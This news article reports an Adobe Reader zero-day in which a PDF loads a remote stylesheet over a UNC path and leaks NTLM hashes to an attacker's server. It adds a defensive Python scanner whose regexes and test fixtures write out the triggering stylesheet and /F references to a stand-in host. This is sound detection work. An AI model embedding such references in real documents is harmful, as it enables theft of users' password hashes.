A micropatch has been made available to resolve a zero-day vulnerability impacting Adobe Reader which could lead to the theft of hashed password values.
The vulnerability was originally disclosed by Alex Inführ on 26 January and proof-of-concept (PoC) code has been published.
The exploit does not rely on a software error or specific vulnerability. Instead, attackers leverage weaknesses in a content embedding feature for PDF files, according to 0patch.
In this case, the problem lies within Adobe Reader DC and, if exploited, permits attackers to force a PDF file to automatically send an SMB request to a threat actor’s server the moment the document is opened.
This, in turn, allows the remote theft of the NTLM hash included in the SMB request. By “phoning home,” attackers are able to steal these hashed password values and are also alerted the moment the document is opened.
The zero-day is “functionally identical” to CVE-2018-4993, according to the researchers — but is simply in a different place.
“While Bad-PDF used an /F entry to load a remote file, this issue exploits loading a remote XML stylesheet via SMB,” 0patch says. “Interestingly, if the document tries to do so via HTTP, there is a security warning there. However, when using a UNC path (the type of path that denotes a resource in a shared folder), the loading occurs without a warning.”
0patch says that the latest version of Adobe Reader DC, version 2019.010.20069, is impacted and it is likely older variants are affected in the same way.
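As an added example (not code from 0patch or from this article), the following defensive triage check scans a PDF's raw bytes and its FlateDecode streams for UNC paths in the two places the article names: a remote XML stylesheet reference and an /F file entry of the Bad-PDF kind. The regexes are this example's own heuristic, and the fixtures are constructed object fragments, not valid or functional PDFs.

```python
import re
import zlib

# UNC path (\\host\share\...). PDF literal strings escape backslashes, so two to
# four leading backslashes are accepted. Heuristic regexes (assumption), not 0patch's logic.
UNC_PATH = rb"\\{2,4}[^\\\s\"'()<>]+\\{1,2}[^\s\"'()<>]+"
INDICATORS = {
    # <?xml-stylesheet ... href="\\host\share\x.xsl"?> : the remote-stylesheet trigger
    "xml-stylesheet-unc": re.compile(
        rb"<\?xml-stylesheet[^>]*href\s*=\s*[\"']" + UNC_PATH, re.I),
    # /F (\\host\share\x) : the file-specification entry Bad-PDF (CVE-2018-4993) used
    "file-entry-unc": re.compile(rb"/F\s*\(\s*" + UNC_PATH),
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def _searchable_chunks(pdf: bytes):
    """Yield the raw file, then every stream body that inflates as zlib (FlateDecode)."""
    yield pdf
    for m in STREAM_RE.finditer(pdf):
        try:
            # decompressobj tolerates trailing bytes and a clipped checksum
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            pass  # uncompressed or non-Flate stream; its raw bytes were already scanned


def find_unc_references(pdf: bytes) -> list:
    """Return (indicator_name, matched_text) for every UNC reference found."""
    hits = []
    for chunk in _searchable_chunks(pdf):
        for name, rx in INDICATORS.items():
            hits.extend((name, m.group(0).decode("latin-1")) for m in rx.finditer(chunk))
    return hits


# Constructed fixtures (assumption): minimal object fragments, not valid or working PDFs.
_XSL_PI = b'<?xml-stylesheet type="text/xsl" href="\\\\192.0.2.10\\share\\style.xsl"?>'
SAMPLE_PLAIN = b"%PDF-1.7\n1 0 obj\n<< >>\nstream\n" + _XSL_PI + b"\nendstream\nendobj\n"
SAMPLE_COMPRESSED = (b"%PDF-1.7\n1 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
                     + zlib.compress(_XSL_PI) + b"\nendstream\nendobj\n")
SAMPLE_F_ENTRY = b"%PDF-1.7\n2 0 obj\n<< /F (\\\\\\\\192.0.2.10\\\\share\\\\x) >>\nendobj\n"
SAMPLE_CLEAN = b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"

if __name__ == "__main__":
    for label, doc in [("plain", SAMPLE_PLAIN), ("compressed", SAMPLE_COMPRESSED),
                       ("f-entry", SAMPLE_F_ENTRY), ("clean", SAMPLE_CLEAN)]:
        print(label, find_unc_references(doc))
```

A hit is a reason to quarantine the file for review at a mail gateway or on an endpoint; egress filtering of SMB (TCP 445) from client networks limits the damage if a document is opened anyway.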
The micropatch alerts users by showing a security warning when a remote stylesheet is loaded via a UNC path, and its source code is available from 0patch.
We can expect to see official security updates released later today due to Adobe’s standard patch schedule.
In January, Adobe resolved a selection of security flaws in Adobe Connect and Digital Editions, including information disclosure problems and privileged session exposure.
The standard security update was one of three releases during the month and was accompanied by an out-of-band patch to squash Adobe Experience Manager and Adobe Experience Manager Forms cross-site scripting bugs.